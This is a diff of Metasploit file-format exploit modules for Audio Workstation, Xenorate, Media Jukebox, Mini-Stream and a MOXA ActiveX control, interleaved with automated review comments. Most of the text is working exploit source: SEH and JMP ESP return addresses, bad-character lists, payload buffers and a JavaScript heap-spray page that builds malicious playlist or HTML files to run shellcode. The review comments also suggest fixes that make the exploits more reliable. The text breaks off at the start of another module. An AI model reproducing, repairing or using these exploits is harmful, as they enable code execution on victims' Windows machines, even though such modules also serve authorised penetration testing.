|
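Review bot: moving `'DisablePayloadHandler' => 'true'` inside the `DefaultOptions` hash is the right fix, since as a top-level info key the framework does not look for it there, but it is still the string `'true'`; the Xenorate hunk in this same diff changes `'DisableNops' => 'True'` to the boolean `true`, and `DisablePayloadHandler` should get the same treatment for consistency. The description block is otherwise only re-indented, and it still says "a remote attacker could overflow a buffer" for what is a local file-format exploit.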
@ -35,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
|
||||
],
|
||||
|
@ -43,10 +57,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'DisclosureDate' => 'Dec 08 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'evil.pls']),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
@ -59,12 +73,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
|
||||
|
||||
pls = sploit
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
file_create(pls)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
|
|
|
@ -1,73 +1,80 @@
|
|||
##
|
||||
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Egghunter
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xenorate 2.50(.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl playlist file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
This module exploits a stack buffer overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'loneferret, original by germaya_x' ],
|
||||
'Version' => '$Revision: $',
|
||||
'Author' =>
|
||||
[
|
||||
'hack4love <hack4love [at] hotmail.com>',
|
||||
'germaya_x',
|
||||
'loneferret',
|
||||
'jduck'
|
||||
],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '57162' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
},
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 5100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'DisableNops' => 'True',
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 10 2009',
|
||||
'DisclosureDate' => 'Aug 19 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'evil.xpl']),
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
# Unleash the Egghunter!
|
||||
eh_stub, eh_egg = generate_egghunter
|
||||
|
||||
sploit = rand_text_alpha_upper(88)
|
||||
sploit << "\xEB\x06\x90\x90"
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(20)
|
||||
buffer << eh_stub
|
||||
buffer << rand_text_alpha_upper(2000)
|
||||
buffer << eh_egg * 2
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
xpl = sploit
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
||||
file_create(xpl)
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
|
|
|
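Review bot: the rewritten `exploit` fixes a genuine bug: the old body appended to `buffer` (`buffer << eh_stub`, `buffer << rand_text_alpha_upper(2000)`, `buffer << eh_egg * 2`) without ever initialising `buffer`, so it would have raised NameError at runtime; with the egghunter gone, dropping `include Msf::Exploit::Egghunter` is correct. Two leftovers: the description still reads "an an attacker" in both old and new text, and `DisclosureDate` moves from 'Dec 10 2009' to 'Aug 19 2009' while the only URL reference is the exploit-db entry 10371, so the commit message should say where the new date comes from. Splitting the single `'loneferret, original by germaya_x'` string into a proper author list is a welcome cleanup.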
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -11,31 +15,32 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ron Henry - <rlh [at] ciphermonk.net>',
|
||||
'Ron Henry <rlh[at]ciphermonk.net>',
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 7828 $',
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '' ],
|
||||
[ 'URL', 'http://www.exploit-db.com' ],
|
||||
[ 'OSVDB', '55924' ],
|
||||
[ 'CVE', '2009-2650']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
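Review bot: the description is re-indented but still reads "an an attacker" in both versions; fix the doubled article while touching it. The reference cleanup is good: the empty `[ 'OSVDB', '' ]` and the bare `http://www.exploit-db.com` URL are replaced by OSVDB 55924 and CVE 2009-2650. The two `include Msf::Exploit::Remote::Seh` lines appear identical, so that part is whitespace only.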
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'July 1 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
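Review bot: `'DisclosureDate' => 'July 1 2009'` is unchanged context here, but its format differs from the 'Dec 08 2009' / 'Aug 19 2009' style used by the other modules in this diff (abbreviated month, two-digit day); normalise it to 'Jul 01 2009' while the file is being touched.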
@ -60,15 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
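Review bot: `"\x68\x74\x74\x70\x3a\x2f\x2f"` is just the ASCII string "http://", as the trailing comment admits; write the literal `"http://"` so the trigger is readable. The rest of the hunk is a re-indentation of the same lines.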
@ -1,3 +1,7 @@
|
|||
##
|
||||
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -15,27 +19,28 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits a stack overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Corlan Security Team ',
|
||||
'Ron Henry - <rlh [at] ciphermonk.net> - EIP Offset fix',
|
||||
'CORELAN Security Team ',
|
||||
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 7828 $',
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '' ],
|
||||
[ 'OSVDB', '61341' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
|
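Review bot: `'CORELAN Security Team '` keeps the trailing space from the old `'Corlan Security Team '`, and `'Ron Henry <rlh[at] ciphermonk.net>'` gains a stray space after `[at]` (compare `'Ron Henry <rlh[at]ciphermonk.net>'` in the Media Jukebox hunk); trim both. The description also still carries the "an an attacker" typo.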
@ -50,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 25 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
@ -60,16 +66,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << "CAFE" * 8
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
print_status("Copy .pls to webserver and pass the URL to the application")
|
||||
|
||||
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
@ -1,78 +0,0 @@
|
|||
##
|
||||
# $Id: mediajukebox.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Media Jukebox 8.0.400 Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Media Jukebox 8.0.400
|
||||
By creating a specially crafted m3u or pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ron Henry <rlh[at]ciphermonk.net>',
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '55924' ],
|
||||
[ 'CVE', '2009-2650']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 3000,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 - English', { 'Ret' => 0x02951457} ], # 0x02951457 pop, pop, ret dsp_mjMain.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x02291457} ], # 0x02291457 pop, pop, ret dsp_mjMain.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'July 1 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.m3u']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
sploit = "\x68\x74\x74\x70\x3a\x2f\x2f" # "http://" trigger
|
||||
sploit << rand_text_alphanumeric(262)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
end
|
||||
|
||||
end
|
|
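Review bot: this deletes a copy of mediajukebox.rb whose contents match the post-change version in the Media Jukebox hunk above (same author list, `$Revision: 11516 $`, OSVDB 55924 / CVE 2009-2650, same `exploit` body), so it reads as a duplicate being removed; the commit message should say which path survives so the two are not confused.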
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: xenorate_xpl_bof.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Xenorate 2.50
|
||||
By creating a specially crafted xpl file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hack4love <hack4love [at] hotmail.com>',
|
||||
'germaya_x',
|
||||
'loneferret',
|
||||
'jduck'
|
||||
],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '57162' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10371' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 5100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'DisableNops' => true,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Aug 19 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.xpl']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(88)
|
||||
sploit << generate_seh_payload(target.ret)
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
|
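Review bot: likewise, this deleted xenorate_xpl_bof.rb matches the new version in the Xenorate hunk (no Egghunter include, 88-byte pad plus `generate_seh_payload`, `'DisableNops' => true`, `msf.xpl` default); treat it as the duplicate being consolidated and record that in the commit message.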
@ -1,81 +0,0 @@
|
|||
##
|
||||
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Remote::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Audio Workstation 6.4.2.4.3 pls Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a buffer overflow in Audio Workstation 6.4.2.4.3.
|
||||
When opening a malicious pls file with the Audio Workstation,
|
||||
a remote attacker could overflow a buffer and execute
|
||||
arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'germaya_x', 'dookie', ],
|
||||
'Version' => '$Revision: 10477 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2009-0476' ],
|
||||
[ 'OSVDB', '55424' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10353' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'seh',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4100,
|
||||
'BadChars' => "\x00",
|
||||
'StackAdjustment' => -3500,
|
||||
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows Universal', { 'Ret' => 0x1101031E } ], # p/p/r in bass.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 08 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
sploit = rand_text_alpha_upper(1308)
|
||||
sploit << "\xeb\x16\x90\x90"
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << make_nops(32)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(4652 - payload.encoded.length)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
|
||||
end
|
||||
|
||||
end
|
|
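Review bot: `sploit << rand_text_alpha_upper(4652 - payload.encoded.length)` relies on 'Space' => 4100 to keep the argument non-negative; the dependency is implicit, so either comment that 4652 is bounded by the Space value or clamp with `[4652 - payload.encoded.length, 0].max`. 'DisableNops' => 'True' is a string here where the other modules in this diff use a boolean. The header `-1,81 +0,0` shows a whole-file removal, so the CVE-2009-0476 / OSVDB 55424 / exploit-db 10353 references recorded in the References block should remain discoverable from wherever the module moves to.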
@ -1,80 +0,0 @@
|
|||
##
|
||||
# $Id: mini_stream.rb 11516 2011-01-08 01:13:26Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Mini-Stream 3.0.1.1 Buffer Overflow Exploit',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in Mini-Stream 3.0.1.1
|
||||
By creating a specially crafted pls file, an an attacker may be able
|
||||
to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'CORELAN Security Team ',
|
||||
'Ron Henry <rlh[at] ciphermonk.net>', # Return address update
|
||||
'dijital1',
|
||||
],
|
||||
'Version' => '$Revision: 11516 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '61341' ],
|
||||
[ 'URL', 'http://www.exploit-db.com/exploits/10745' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'thread',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 3500,
|
||||
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
|
||||
'StackAdjustment' => -3500,
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 - English', { 'Ret' => 0x7e429353} ], # 0x7e429353 JMP ESP - USER32.dll
|
||||
[ 'Windows XP SP2 - English', { 'Ret' => 0x7c941eed} ], # 0x7c941eed JMP ESP - SHELL32.dll
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Dec 25 2009',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'metasploit.pls']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
sploit = rand_text_alphanumeric(17403)
|
||||
sploit << [target.ret].pack('V')
|
||||
sploit << "CAFE" * 8
|
||||
sploit << payload.encoded
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
file_create(sploit)
|
||||
print_status("Copy '#{datastore['FILENAME']}' to a web server and pass the URL to the application")
|
||||
end
|
||||
|
||||
end
|
||||
|
|
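Review bot: the 'BadChars' string lists \x3a, \x26, \x3f, \x23, \x2f, \x2b and \x5c twice each; duplicates do not hurt the encoder, but they obscure which characters were actually verified against the target, so deduplicate the list and comment why each is excluded (the final print_status says the file is fetched from a URL, which explains the URL-reserved set). `sploit << "CAFE" * 8` is a 32-byte filler between the return address and the payload with no comment on what it pads. Removal per `-1,80 +0,0`; OSVDB 61341 / exploit-db 10745 are the references that leave with it.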
@ -1,102 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'MOXA MediaDBPlayback ActiveX Control Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack buffer overflow in MOXA_ActiveX_SDK. When
|
||||
sending an overly long string to the PlayFileName() of MediaDBPlayback.DLL (2.2.0.5)
|
||||
an attacker may be able to execute arbitrary code.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'MC' ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-4742' ],
|
||||
[ 'OSVDB', '68986'],
|
||||
[ 'URL', 'http://www.moxa.com' ],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1024,
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => 0x0a0a0a0a } ]
|
||||
],
|
||||
'DisclosureDate' => 'Oct 19 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ false, 'The file name.', 'msf.html']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
# Encode the shellcode.
|
||||
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
|
||||
|
||||
# Create some nops.
|
||||
nops = Rex::Text.to_unescape(make_nops(4))
|
||||
|
||||
# Set the return.
|
||||
ret = Rex::Text.uri_encode([target.ret].pack('L'))
|
||||
|
||||
# Randomize the javascript variable names.
|
||||
vname = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(30) + 2)
|
||||
rand1 = rand_text_alpha(rand(100) + 1)
|
||||
rand2 = rand_text_alpha(rand(100) + 1)
|
||||
rand3 = rand_text_alpha(rand(100) + 1)
|
||||
rand4 = rand_text_alpha(rand(100) + 1)
|
||||
rand5 = rand_text_alpha(rand(100) + 1)
|
||||
rand6 = rand_text_alpha(rand(100) + 1)
|
||||
rand7 = rand_text_alpha(rand(100) + 1)
|
||||
rand8 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
content = %Q|
|
||||
<html>
|
||||
<object id ='#{vname}' classid='clsid:5B32067A-121B-49DE-8182-91EB13DDF8D6'></object>
|
||||
<script language ="javascript">
|
||||
var #{rand1} = unescape('#{shellcode}');
|
||||
var #{rand2} = unescape('#{nops}');
|
||||
var #{rand3} = 20;
|
||||
var #{rand4} = #{rand3} + #{rand1}.length;
|
||||
while (#{rand2}.length < #{rand4}) #{rand2} += #{rand2};
|
||||
var #{rand5} = #{rand2}.substring(0,#{rand4});
|
||||
var #{rand6} = #{rand2}.substring(0,#{rand2}.length - #{rand4});
|
||||
while (#{rand6}.length + #{rand4} < 0x40000) #{rand6} = #{rand6} + #{rand6} + #{rand5};
|
||||
var #{rand7} = new Array();
|
||||
for (#{var_i} = 0; #{var_i} < 400; #{var_i}++){ #{rand7}[#{var_i}] = #{rand6} + #{rand1} }
|
||||
var #{rand8} = "";
|
||||
for (#{var_i} = 0; #{var_i} < 14500; #{var_i}++) { #{rand8} = #{rand8} + unescape('#{ret}') }
|
||||
#{vname}.PlayFileName = #{rand8};
|
||||
</script>
|
||||
</html>
|
||||
|
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
||||
file_create(content)
|
||||
end
|
||||
|
||||
end
|
|
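Review bot: `ret = Rex::Text.uri_encode([target.ret].pack('L'))` uses pack('L'), which follows the byte order of the host running the module, while the shellcode two statements above is emitted with `Rex::Arch.endian(target.arch)`; the explicit little-endian pack('V') used by the other modules in this diff is the right form for a Win32 target. The same line uses `uri_encode` where the shellcode and nops use `to_unescape`; both feed JavaScript `unescape()`, but one helper should serve all three. Removal per `-1,102 +0,0`; CVE-2010-4742 / OSVDB 68986 go with it.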
@ -1,76 +0,0 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::TcpServer
|
